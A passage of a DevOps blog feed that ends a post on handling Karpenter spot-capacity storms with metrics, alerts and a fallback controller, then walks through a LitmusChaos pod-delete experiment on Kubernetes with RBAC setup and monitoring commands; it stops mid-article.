<h2 id="h2-workaround-3-a-tiny-external-controller" class="group relative scroll-mt-24">
        <a href="#h2-workaround-3-a-tiny-external-controller" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Workaround 3: a tiny external controller
        </a>
        </h2><p>There is no upstream-blessed operator for spot-storm detection. Some teams build a small controller that watches Karpenter&#39;s error metrics and patches the spot NodePool to temporarily remove <code>spot</code> from <code>karpenter.sh/capacity-type</code> when interruption rates spike. The shape is straightforward:</p>
<pre><code class="hljs language-text">1. Watch karpenter_cloudprovider_errors_total{error=~&quot;Insufficient.*|Unfulfillable.*&quot;}
2. If rate &gt; threshold for N minutes, patch the spot NodePool:
     requirements:
       - key: karpenter.sh/capacity-type
         operator: In
         values: [&quot;on-demand&quot;]
3. After M minutes of error-rate quiet, revert.
</code></pre><p>This is not a substitute for workarounds 1 and 2. It is what you build when narrow-constraint workloads (GPU, instance-pinned) still need a fallback path. Treat it as an internal tool, not a product.</p>
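<p>The three steps above, sketched as decision logic. This is an added example, not code from the original post or from Karpenter: the names <code>StormGate</code>, <code>with_capacity_types</code>, <code>merge_patch</code> and <code>replay</code>, the thresholds, and the sample rates are all constructed for illustration, and fetching the metric and applying the patch are left out.</p>

```python
"""Decision logic for a spot-storm fallback controller (added example)."""
from copy import deepcopy
from dataclasses import dataclass
from typing import Optional

CAPACITY_KEY = "karpenter.sh/capacity-type"


@dataclass
class StormGate:
    """Hysteresis over the capacity-error rate: trip after `trip_after_s`
    seconds continuously above `threshold`, clear after `clear_after_s`
    seconds continuously at or below it."""
    threshold: float      # errors per second
    trip_after_s: int     # "N minutes" from step 2, in seconds
    clear_after_s: int    # "M minutes" from step 3, in seconds
    tripped: bool = False
    since: Optional[int] = None  # start of the streak that may flip the state

    def observe(self, ts: int, rate: Optional[float]) -> Optional[str]:
        """Feed one sample; return "fallback", "revert" or None.
        rate=None means the scrape failed. It resets the streak and never
        changes state, so missing data neither trips nor clears the gate."""
        if rate is None:
            self.since = None
            return None
        hot = rate > self.threshold
        if hot == self.tripped:
            # The sample agrees with the current state: no streak to count.
            self.since = None
            return None
        if self.since is None:
            self.since = ts
        needed = self.clear_after_s if self.tripped else self.trip_after_s
        if ts - self.since >= needed:
            self.tripped = not self.tripped
            self.since = None
            return "fallback" if self.tripped else "revert"
        return None


def with_capacity_types(requirements: list, values: list) -> list:
    """Copy a NodePool requirements list, changing only the capacity-type
    entry. Family, CPU and arch entries (and their minValues) are kept."""
    out = deepcopy(requirements)
    matches = [r for r in out if r.get("key") == CAPACITY_KEY]
    if len(matches) != 1:
        raise ValueError(f"expected exactly one {CAPACITY_KEY} requirement")
    matches[0]["values"] = list(values)
    return out


def merge_patch(requirements: list) -> dict:
    """Body for a JSON merge patch of the NodePool. A merge patch replaces a
    list wholesale, so the body must carry the complete requirements list,
    not just the capacity-type entry."""
    return {"spec": {"template": {"spec": {"requirements": requirements}}}}


def replay(samples, gate: StormGate, requirements: list) -> list:
    """Run (timestamp, rate) samples through the gate and return the
    (timestamp, action, patch body) tuples a controller would act on."""
    original = next(r["values"] for r in requirements if r["key"] == CAPACITY_KEY)
    events = []
    for ts, rate in samples:
        action = gate.observe(ts, rate)
        if action is None:
            continue
        target = ["on-demand"] if action == "fallback" else original
        events.append((ts, action, merge_patch(with_capacity_types(requirements, target))))
    return events


# Constructed input: the spot NodePool from workaround 1, abbreviated.
SPOT_REQUIREMENTS = [
    {"key": CAPACITY_KEY, "operator": "In", "values": ["spot"]},
    {"key": "karpenter.k8s.aws/instance-family", "operator": "In",
     "values": ["c7i", "c6i", "m7i", "m6i", "r7i", "r6i"], "minValues": 6},
    {"key": "kubernetes.io/arch", "operator": "In", "values": ["amd64"]},
]

# Constructed samples: (seconds, capacity errors per second), one per minute.
SAMPLES = (
    [(0, 0.0), (60, 0.3), (120, 0.4), (180, 0.05)]   # short spike, then a dip
    + [(240, 0.5), (300, 0.6), (360, None)]          # spike cut by a failed scrape
    + [(t, 0.6) for t in range(420, 781, 60)]        # sustained storm
    + [(840, 0.02), (900, 0.2)]                      # quiet, then a relapse
    + [(t, 0.0) for t in range(960, 1621, 60)]       # sustained quiet
)

if __name__ == "__main__":
    gate = StormGate(threshold=0.1, trip_after_s=300, clear_after_s=600)
    for ts, action, patch in replay(SAMPLES, gate, SPOT_REQUIREMENTS):
        capacity = patch["spec"]["template"]["spec"]["requirements"][0]["values"]
        print(ts, action, capacity)
```

<p>The short spike, the failed scrape and the relapse each restart the clock, so the gate flips only on a sustained signal in either direction.</p>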
<h2 id="h2-metrics-that-catch-the-storm" class="group relative scroll-mt-24">
        <a href="#h2-metrics-that-catch-the-storm" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Metrics that catch the storm
        </a>
        </h2><p>Karpenter exposes a useful set of cloudprovider metrics. The ones that matter during a storm:</p>
<ul>
<li><code>karpenter_cloudprovider_errors_total</code>: label <code>error</code> carries <code>InsufficientInstanceCapacity</code>, <code>UnfulfillableCapacity</code>, <code>MaxSpotInstanceCountExceeded</code>. A spike is the storm starting.</li>
<li><code>karpenter_cloudprovider_instance_type_offering_available</code>: gauge per <code>instance_type</code> / <code>capacity_type</code> / <code>zone</code>. Watch the sum drop.</li>
<li><code>karpenter_nodeclaims_created_total</code>, <code>karpenter_nodeclaims_terminated_total</code>, <code>karpenter_nodeclaims_disrupted_total{reason=&quot;interruption&quot;}</code>: when <code>disrupted{reason=interruption}</code> rate approaches <code>created</code> rate, you are churning.</li>
<li><code>karpenter_interruption_received_messages_total{message_type=&quot;SpotInterruptionKind&quot;}</code>: spot 2-minute warnings from the SQS queue.</li>
<li><code>karpenter_voluntary_disruption_decisions_total</code>, <code>karpenter_voluntary_disruption_queue_failures_total</code>.</li>
</ul>
<p>A working Prometheus alert that has caught real storms in production:</p>
<pre><code class="hljs language-yaml"><span class="hljs-bullet">-</span> <span class="hljs-attr">alert:</span> <span class="hljs-string">KarpenterSpotStorm</span>
  <span class="hljs-attr">expr:</span> <span class="hljs-string">|
    sum(rate(karpenter_nodeclaims_disrupted_total{reason=&quot;interruption&quot;}[10m])) &gt; 0.05
    and
    sum(rate(karpenter_cloudprovider_errors_total{error=~&quot;InsufficientInstanceCapacity|UnfulfillableCapacity&quot;}[10m])) &gt; 0.1
</span>  <span class="hljs-attr">for:</span> <span class="hljs-string">10m</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">severity:</span> <span class="hljs-string">warning</span>
  <span class="hljs-attr">annotations:</span>
    <span class="hljs-attr">summary:</span> <span class="hljs-string">&quot;Karpenter is looping on spot capacity errors&quot;</span>
    <span class="hljs-attr">description:</span> <span class="hljs-string">|
      Spot interruption rate is above 0.05/s AND CreateFleet capacity
      errors are above 0.1/s for 10m. The 3-minute offering TTL is
      probably looping. Consider temporarily widening the on-demand
      NodePool weight or removing &#x27;spot&#x27; from the capacity-type
      requirement until the region clears.</span>
</code></pre><p>The <code>and</code> matters. Either signal alone is noisy. Together they describe the loop specifically.</p>
<h2 id="h2-known-bugs-in-the-metrics-themselves" class="group relative scroll-mt-24">
        <a href="#h2-known-bugs-in-the-metrics-themselves" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Known bugs in the metrics themselves
        </a>
        </h2><p>A few sharp edges worth knowing about before you build a dashboard on these:</p>
<ul>
<li><code>karpenter_interruption_received_messages_total{message_type=&quot;SpotInterruptionKind&quot;}</code> includes account-wide spot interruption events, not just Karpenter-managed instances. It will not match <code>karpenter_nodeclaims_terminated_total{reason=&quot;interruption&quot;}</code>. Issue <code>aws/karpenter-provider-aws#6376</code> is still open as of writing.</li>
<li>Earlier versions of Karpenter (around v0.37.0) incremented <code>karpenter_interruption_received_messages_total</code> by 2 per event. The fix shipped, but it is worth verifying against the cluster version you actually run. Issue <code>#6531</code>.</li>
<li>Metrics scraped from the standby (non-leader) replica return zeros or stale values, so scraping the Service can yield phantom drops. Issue <code>kubernetes-sigs/karpenter#1450</code>. Scrape the Pod, not the Service, or scrape both and reconcile.</li>
<li><code>karpenter_cloudprovider_errors_total</code> does not carry a <code>nodepool</code> label. You cannot alert directly on &quot;the spot NodePool is storming.&quot; Infer it from the <code>capacity_type</code> label if your provider build labels it, and confirm against your version. Open ask in <code>#8224</code>.</li>
</ul>
<h2 id="h2-what-to-expect-from-the-roadmap" class="group relative scroll-mt-24">
        <a href="#h2-what-to-expect-from-the-roadmap" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What to expect from the roadmap
        </a>
        </h2><p>As of writing, none of the obvious &quot;automatic fallback&quot; feature requests are scheduled. Issue <code>#8298</code> was closed without implementation. Issue <code>#2275</code> was closed as working-as-intended in January 2026. The configurable cache TTL and NodePool-aware metrics in <code>#8224</code> are still open with no design doc attached.</p>
<p>This is not because the maintainers don&#39;t care. It is because the architectural answer they are committed to (wide requirements plus <code>minValues</code> plus weighted NodePools) covers most cases. The cases it does not cover (narrow-constraint workloads, regional storms) are real, but rare enough that the project has not prioritized building the fallback machinery.</p>
<p>Practically, this means the production posture is yours to design. Plan for the storm.</p>
<h2 id="h2-summary" class="group relative scroll-mt-24">
        <a href="#h2-summary" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Summary
        </a>
        </h2><p>Karpenter does not auto-fail-over from spot to on-demand. The 3-minute offering TTL plus per-offering retry semantics produce a tight loop during regional capacity storms that can keep workloads Pending for hours while on-demand capacity sits idle. The maintainers consider this intentional and recommend wide instance-type requirements plus weighted NodePools as the answer.</p>
<p>In production, run:</p>
<ol>
<li>A spot NodePool with at least six instance families and <code>minValues: 6</code> on family, plus <code>minValues</code> on CPU.</li>
<li>A separate on-demand NodePool with a <code>karpenter.sh/capacity-type=on-demand:NoSchedule</code> taint so fallback is opt-in.</li>
<li>A Prometheus alert that pairs <code>karpenter_nodeclaims_disrupted_total{reason=&quot;interruption&quot;}</code> rate with <code>karpenter_cloudprovider_errors_total</code> rate, firing only when both spike together.</li>
<li>An internal runbook that documents how to temporarily remove <code>spot</code> from the spot NodePool&#39;s <code>karpenter.sh/capacity-type</code> values during a storm, since Karpenter will not do it for you.</li>
</ol>
<p>The smart spot handler is still the right default. Just don&#39;t trust it to handle the day spot capacity stops being a thing.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Running Your First Chaos Engineering Experiment with Litmus]]></title>
      <link>https://devops-daily.com/posts/running-first-chaos-engineering-experiment-litmus</link>
      <description><![CDATA[A hands-on walkthrough of installing LitmusChaos on Kubernetes, killing pods on purpose, and watching whether your app actually recovers. Real YAML, real output, no theory.]]></description>
      <pubDate>Mon, 18 May 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/running-first-chaos-engineering-experiment-litmus</guid>
      <category><![CDATA[Kubernetes]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[chaos-engineering]]></category><category><![CDATA[litmus]]></category><category><![CDATA[kubernetes]]></category><category><![CDATA[resilience]]></category><category><![CDATA[sre]]></category>
      <content:encoded><![CDATA[<p>Your deployment has three replicas. Your readiness probe is set. Your HPA is configured. On paper, you can lose a pod and nothing should happen. But you have never actually tested it, because the only time pods die in production is at 3am, and by then it is too late to find out the readiness probe was checking the wrong port.</p>
<p>That is the gap chaos engineering fills. You break things on purpose during business hours, with a hypothesis and a stop button, and you learn what actually happens before a node failure or a kernel OOM teaches you the hard way.</p>
<p>This post walks through running your first experiment with LitmusChaos: install it, target a real deployment, kill a pod, and watch whether the system recovers like you expect.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TL;DR
        </a>
        </h2><p>Install Litmus with Helm, label your target deployment, apply a <code>ChaosExperiment</code> and <code>ChaosEngine</code> for <code>pod-delete</code>, and watch the <code>ChaosResult</code> to see if your app passed. The whole loop takes about 20 minutes on a fresh cluster.</p>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        </h2><ul>
<li>A Kubernetes cluster you do not mind poking. A local <code>kind</code> or <code>minikube</code> cluster is fine for the first run.</li>
<li><code>kubectl</code> configured and pointing at that cluster.</li>
<li>Helm 3.x installed.</li>
<li>A workload to break. The post uses <code>nginx</code> with three replicas, but any Deployment will do.</li>
</ul>
<p>If you do not have a cluster handy, spin one up with <code>kind</code>:</p>
<pre><code class="hljs language-bash">kind create cluster --name chaos-lab
kubectl cluster-info --context kind-chaos-lab
</code></pre><h2 id="h2-what-litmus-actually-is" class="group relative scroll-mt-24">
        <a href="#h2-what-litmus-actually-is" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What Litmus Actually Is
        </a>
        </h2><p>Litmus is a Kubernetes-native chaos platform. You write experiments as YAML, apply them with <code>kubectl</code>, and Litmus runs a chaos runner pod that injects the failure (kill a pod, hog CPU, drop network packets) against a target you select with labels.</p>
<p>Three resources matter:</p>
<ul>
<li><strong>ChaosExperiment</strong>: the definition of the fault. What to inject, with what defaults. Think of it as a function.</li>
<li><strong>ChaosEngine</strong>: the invocation. Which experiment, against which target, with what arguments. This is the thing you apply when you want chaos to start.</li>
<li><strong>ChaosResult</strong>: the verdict. Pass or fail, written by Litmus after the experiment runs.</li>
</ul>
<p>You install the platform once. You ship experiments per fault type. You apply engines per drill.</p>
<h2 id="h2-install-litmus" class="group relative scroll-mt-24">
        <a href="#h2-install-litmus" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Install Litmus
        </a>
        </h2><p>Add the Helm repo and install the control plane into its own namespace:</p>
<pre><code class="hljs language-bash">kubectl create namespace litmus

helm repo add litmuschaos https://litmuschaos.github.io/litmus-helm/
helm repo update

helm install chaos litmuschaos/litmus \
  --namespace=litmus \
  --<span class="hljs-built_in">set</span> portal.frontend.service.type=ClusterIP
</code></pre><p>Wait for the pods to come up:</p>
<pre><code class="hljs language-bash">kubectl -n litmus get pods
</code></pre><p>You should see something like this:</p>
<pre><code class="hljs language-text">NAME                                     READY   STATUS    RESTARTS   AGE
chaos-litmus-frontend-7c8f6b9c4d-x2k8m   1/1     Running   0          2m
chaos-litmus-server-6b5d4f8c9-pq7nz      1/1     Running   0          2m
chaos-mongo-0                            1/1     Running   0          2m
</code></pre><p>The control plane is the optional ChaosCenter UI. The actual experiment runner is the chaos operator, which you install next.</p>
<h2 id="h2-install-the-chaos-operator-and-experiments" class="group relative scroll-mt-24">
        <a href="#h2-install-the-chaos-operator-and-experiments" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Install the Chaos Operator and Experiments
        </a>
        </h2><p>The operator watches for <code>ChaosEngine</code> resources and runs them. The experiment catalog ships separately so you can pick the faults you want.</p>
<pre><code class="hljs language-bash">kubectl apply -f https://litmuschaos.github.io/litmus/3.0.0/litmus-k8s-3.0.0.yaml
</code></pre><p>Check that the operator is healthy:</p>
<pre><code class="hljs language-bash">kubectl -n litmus get pods -l app.kubernetes.io/component=operator
</code></pre><p>Then load the generic experiment pack (pod-delete, container-kill, pod-cpu-hog, pod-memory-hog, and more) into the namespace where your target lives. For this walkthrough, that namespace is <code>default</code>:</p>
<pre><code class="hljs language-bash">kubectl apply -f <span class="hljs-string">&quot;https://hub.litmuschaos.io/api/chaos/3.0.0?file=charts/generic/experiments.yaml&quot;</span> -n default
</code></pre><p>Verify the experiments are registered:</p>
<pre><code class="hljs language-bash">kubectl get chaosexperiments -n default
</code></pre><pre><code class="hljs language-text">NAME                AGE
pod-delete          12s
container-kill      12s
pod-cpu-hog         12s
pod-memory-hog      12s
pod-network-loss    12s
</code></pre><h2 id="h2-deploy-something-to-break" class="group relative scroll-mt-24">
        <a href="#h2-deploy-something-to-break" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Deploy Something to Break
        </a>
        </h2><p>If you do not already have a target, deploy a small nginx with three replicas:</p>
<pre><code class="hljs language-bash">kubectl create deployment web --image=nginx:1.27 --replicas=3
kubectl expose deployment web --port=80
kubectl label deployment web app=web
</code></pre><p>Confirm the pods are running:</p>
<pre><code class="hljs language-bash">kubectl get pods -l app=web
</code></pre><pre><code class="hljs language-text">NAME                   READY   STATUS    RESTARTS   AGE
web-6c8b9d7f4-2lhmn    1/1     Running   0          30s
web-6c8b9d7f4-7gxqp    1/1     Running   0          30s
web-6c8b9d7f4-rk9vx    1/1     Running   0          30s
</code></pre><h2 id="h2-give-litmus-permission-to-cause-chaos" class="group relative scroll-mt-24">
        <a href="#h2-give-litmus-permission-to-cause-chaos" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Give Litmus Permission to Cause Chaos
        </a>
        </h2><p>Litmus runs experiments under a ServiceAccount with a tightly scoped Role. Without it, the experiment pod cannot touch your workload. Apply this RBAC into the <code>default</code> namespace:</p>
<pre><code class="hljs language-yaml"><span class="hljs-comment"># litmus-rbac.yaml</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">ServiceAccount</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">pod-delete-sa</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">default</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">name:</span> <span class="hljs-string">pod-delete-sa</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">rbac.authorization.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Role</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">pod-delete-sa</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">default</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">name:</span> <span class="hljs-string">pod-delete-sa</span>
<span class="hljs-attr">rules:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">apiGroups:</span> [<span class="hljs-string">&quot;&quot;</span>]
    <span class="hljs-attr">resources:</span> [<span class="hljs-string">&quot;pods&quot;</span>, <span class="hljs-string">&quot;events&quot;</span>]
    <span class="hljs-attr">verbs:</span> [<span class="hljs-string">&quot;create&quot;</span>, <span class="hljs-string">&quot;list&quot;</span>, <span class="hljs-string">&quot;get&quot;</span>, <span class="hljs-string">&quot;patch&quot;</span>, <span class="hljs-string">&quot;update&quot;</span>, <span class="hljs-string">&quot;delete&quot;</span>, <span class="hljs-string">&quot;deletecollection&quot;</span>]
  <span class="hljs-bullet">-</span> <span class="hljs-attr">apiGroups:</span> [<span class="hljs-string">&quot;&quot;</span>]
    <span class="hljs-attr">resources:</span> [<span class="hljs-string">&quot;pods/log&quot;</span>, <span class="hljs-string">&quot;replicationcontrollers&quot;</span>, <span class="hljs-string">&quot;configmaps&quot;</span>, <span class="hljs-string">&quot;services&quot;</span>]
    <span class="hljs-attr">verbs:</span> [<span class="hljs-string">&quot;get&quot;</span>, <span class="hljs-string">&quot;list&quot;</span>]
  <span class="hljs-bullet">-</span> <span class="hljs-attr">apiGroups:</span> [<span class="hljs-string">&quot;apps&quot;</span>]
    <span class="hljs-attr">resources:</span> [<span class="hljs-string">&quot;deployments&quot;</span>, <span class="hljs-string">&quot;statefulsets&quot;</span>, <span class="hljs-string">&quot;daemonsets&quot;</span>, <span class="hljs-string">&quot;replicasets&quot;</span>]
    <span class="hljs-attr">verbs:</span> [<span class="hljs-string">&quot;list&quot;</span>, <span class="hljs-string">&quot;get&quot;</span>]
  <span class="hljs-bullet">-</span> <span class="hljs-attr">apiGroups:</span> [<span class="hljs-string">&quot;litmuschaos.io&quot;</span>]
    <span class="hljs-attr">resources:</span> [<span class="hljs-string">&quot;chaosengines&quot;</span>, <span class="hljs-string">&quot;chaosexperiments&quot;</span>, <span class="hljs-string">&quot;chaosresults&quot;</span>]
    <span class="hljs-attr">verbs:</span> [<span class="hljs-string">&quot;create&quot;</span>, <span class="hljs-string">&quot;list&quot;</span>, <span class="hljs-string">&quot;get&quot;</span>, <span class="hljs-string">&quot;patch&quot;</span>, <span class="hljs-string">&quot;update&quot;</span>, <span class="hljs-string">&quot;delete&quot;</span>]
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">rbac.authorization.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">RoleBinding</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">pod-delete-sa</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">default</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">name:</span> <span class="hljs-string">pod-delete-sa</span>
<span class="hljs-attr">roleRef:</span>
  <span class="hljs-attr">apiGroup:</span> <span class="hljs-string">rbac.authorization.k8s.io</span>
  <span class="hljs-attr">kind:</span> <span class="hljs-string">Role</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">pod-delete-sa</span>
<span class="hljs-attr">subjects:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">kind:</span> <span class="hljs-string">ServiceAccount</span>
    <span class="hljs-attr">name:</span> <span class="hljs-string">pod-delete-sa</span>
    <span class="hljs-attr">namespace:</span> <span class="hljs-string">default</span>
</code></pre><pre><code class="hljs language-bash">kubectl apply -f litmus-rbac.yaml
</code></pre><h2 id="h2-write-the-experiment" class="group relative scroll-mt-24">
        <a href="#h2-write-the-experiment" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Write the Experiment
        </a>
        </h2><p>Time for the actual fault. This <code>ChaosEngine</code> targets the <code>web</code> deployment, picks one pod at random every 10 seconds for 30 seconds total, and kills it. The deployment controller should immediately create replacements.</p>
<pre><code class="hljs language-yaml"><span class="hljs-comment"># pod-delete-engine.yaml</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">litmuschaos.io/v1alpha1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">ChaosEngine</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">web-pod-delete</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">default</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">appinfo:</span>
    <span class="hljs-attr">appns:</span> <span class="hljs-string">default</span>
    <span class="hljs-attr">applabel:</span> <span class="hljs-string">&#x27;app=web&#x27;</span>
    <span class="hljs-attr">appkind:</span> <span class="hljs-string">&#x27;deployment&#x27;</span>
  <span class="hljs-attr">chaosServiceAccount:</span> <span class="hljs-string">pod-delete-sa</span>
  <span class="hljs-attr">engineState:</span> <span class="hljs-string">&#x27;active&#x27;</span>
  <span class="hljs-attr">experiments:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">pod-delete</span>
      <span class="hljs-attr">spec:</span>
        <span class="hljs-attr">components:</span>
          <span class="hljs-attr">env:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">TOTAL_CHAOS_DURATION</span>
              <span class="hljs-attr">value:</span> <span class="hljs-string">&#x27;30&#x27;</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">CHAOS_INTERVAL</span>
              <span class="hljs-attr">value:</span> <span class="hljs-string">&#x27;10&#x27;</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">FORCE</span>
              <span class="hljs-attr">value:</span> <span class="hljs-string">&#x27;false&#x27;</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">PODS_AFFECTED_PERC</span>
              <span class="hljs-attr">value:</span> <span class="hljs-string">&#x27;33&#x27;</span>
</code></pre><p>A few things worth flagging:</p>
<ul>
<li><code>applabel</code> is how Litmus picks targets. Anything matching <code>app=web</code> in the <code>default</code> namespace is fair game.</li>
<li><code>PODS_AFFECTED_PERC: &#39;33&#39;</code> means one pod out of three each round. Start small.</li>
<li><code>FORCE: &#39;false&#39;</code> uses a graceful delete with the pod&#39;s terminationGracePeriod. Flip to <code>true</code> to simulate a kernel kill, which is the more honest test.</li>
<li><code>engineState: active</code> starts the experiment immediately on apply. Set it to <code>stop</code> to bail out.</li>
</ul>
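<p>Before applying the engine, the permissions behind <code>chaosServiceAccount: pod-delete-sa</code> can be checked against the Role from the RBAC step. This is an added example, not part of the original article or the Litmus project; the function name <code>audit_chaos_sa</code> and the choice of actions that must be denied are assumptions made for illustration.</p>

```shell
#!/bin/sh
# Added example: check the effective permissions of the chaos ServiceAccount
# with `kubectl auth can-i` and impersonation.
# Usage: audit_chaos_sa NAMESPACE SERVICEACCOUNT
# The caller must be allowed to impersonate ServiceAccounts (cluster-admin is).

audit_chaos_sa() {
  ns=$1
  sa=$2
  subject="system:serviceaccount:${ns}:${sa}"
  failures=0

  # Columns: verb  resource  namespace  expected answer.
  # "yes" rows are taken from the Role in litmus-rbac.yaml.
  # "no" rows are this example's assumption of what the Role must not allow.
  while read -r verb resource target expected; do
    [ -n "$verb" ] || continue
    # can-i prints yes/no and exits non-zero on "no", so the status is ignored.
    # stdin is redirected so kubectl cannot consume the table being read.
    answer=$(kubectl auth can-i "$verb" "$resource" \
      --as="$subject" -n "$target" 2>/dev/null </dev/null) || true
    if [ "$answer" = "$expected" ]; then
      status=ok
    else
      status=MISMATCH
      failures=$((failures + 1))
    fi
    printf '%-8s %-6s %-30s ns=%-12s expected=%-3s got=%s\n' \
      "$status" "$verb" "$resource" "$target" "$expected" "${answer:-error}"
  done <<EOF
delete pods $ns yes
create events $ns yes
get pods/log $ns yes
list deployments.apps $ns yes
create chaosresults.litmuschaos.io $ns yes
get secrets $ns no
create pods/exec $ns no
delete deployments.apps $ns no
delete pods kube-system no
EOF

  # Succeed only if every answer matched the expectation.
  [ "$failures" -eq 0 ]
}
```

<p>Run it as <code>audit_chaos_sa default pod-delete-sa</code> once <code>litmus-rbac.yaml</code> is applied. A <code>MISMATCH</code> on a <code>no</code> row means some other binding grants the account more than this Role does; note that the Role itself allows deleting any pod in <code>default</code>, not only those labelled <code>app=web</code>.</p>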
<p>Apply it:</p>
<pre><code class="hljs language-bash">kubectl apply -f pod-delete-engine.yaml
</code></pre><h2 id="h2-watch-it-run" class="group relative scroll-mt-24">
        <a href="#h2-watch-it-run" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Watch It Run
        </a>
        </h2><p>Open three terminals. In the first, watch your app:</p>
<pre><code class="hljs language-bash">kubectl get pods -l app=web -w
</code></pre><p>You should see pods being terminated and new ones starting:</p>
<pre><code class="hljs language-text">web-6c8b9d7f4-2lhmn    1/1     Terminating   0     2m
web-6c8b9d7f4-zk4tx    0/1     Pending       0     0s
web-6c8b9d7f4-zk4tx    0/1     ContainerCreating  0  1s
web-6c8b9d7f4-zk4tx    1/1     Running       0     3s
</code></pre><p>In the second, watch the Litmus runner pod:</p>
<pre><code class="hljs language-bash">kubectl -n default get pods -l name=web-pod-delete-runner -w
</code></pre><p>In the third, hammer the service so you can see if traffic ever fails:</p>
<pre><code class="hljs language-bash">kubectl run curl-loop --image=curlimages/curl --restart=Never -- \
  sh -c <span class="hljs-string">&#x27;while true; do curl -s -o /dev/null -w &quot;%{http_code}\n&quot; http://web; sleep 0.5; done&#x27;</span>

kubectl logs -f curl-loop
</code></pre><p>If your readiness probe and service are wired up correctly, you see a stream of <code>200</code>s. If you see <code>000</code> or <code>503</code> in there, that is a finding. Either readiness is lying about pod health, or your replica count is too low to absorb a single failure.</p>
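<p>To turn the status-code stream from the curl loop into a finding you can record, the function below counts non-<code>200</code> responses and the longest unbroken run of failures. It is an added example, not part of the original article; the names <code>summarize_codes</code> and <code>sample_codes</code> and the sample data are constructed.</p>

```shell
#!/bin/sh
# Added example: summarize the output of the curl loop (one HTTP status per line).
# Usage: kubectl logs curl-loop | summarize_codes 0.5
# $1 is the pause between requests in seconds (the loop on this page sleeps 0.5).
# Exit status is 1 if any response was not 200, so it can gate a script.

summarize_codes() {
  LC_ALL=C awk -v interval="${1:-0.5}" '
    # Only lines that are exactly three digits are status codes; skip the rest.
    /^[0-9][0-9][0-9]$/ {
      total++
      if ($0 == "200") { ok++; run = 0; next }
      # curl prints 000 when it received no HTTP response at all
      # (connection refused, reset or timed out).
      if ($0 == "000") no_response++; else http_error++
      run++
      if (run > longest) longest = run
    }
    END {
      # longest * interval is a lower bound on the outage: each request
      # also takes time on top of the sleep.
      printf "total=%d ok=%d no_response=%d http_error=%d longest_failure_run=%d min_outage_s=%.1f\n",
        total, ok, no_response, http_error, longest, longest * interval
      exit ((no_response + http_error) > 0 ? 1 : 0)
    }'
}

# Constructed sample: what the loop might print while a pod is being replaced.
sample_codes() {
  printf '%s\n' 200 200 000 000 503 200 200 503 200
}
```

<p>A non-zero <code>longest_failure_run</code> gives a lower bound on how long clients saw errors, which is easier to compare between runs than scrolling through raw output.</p>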
<h2 id="h2-read-the-verdict" class="group relative scroll-mt-24">
        <a href="#h2-read-the-verdict" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Read the Verdict
        </a>
        </h2><p>When the runner pod finishes, look at the result:</p>
<pre><code class="hljs language-bash">kubectl get chaosresult web-pod-delete-pod-delete -n default -o yaml
</code></pre><p>The interesting bit:</p>
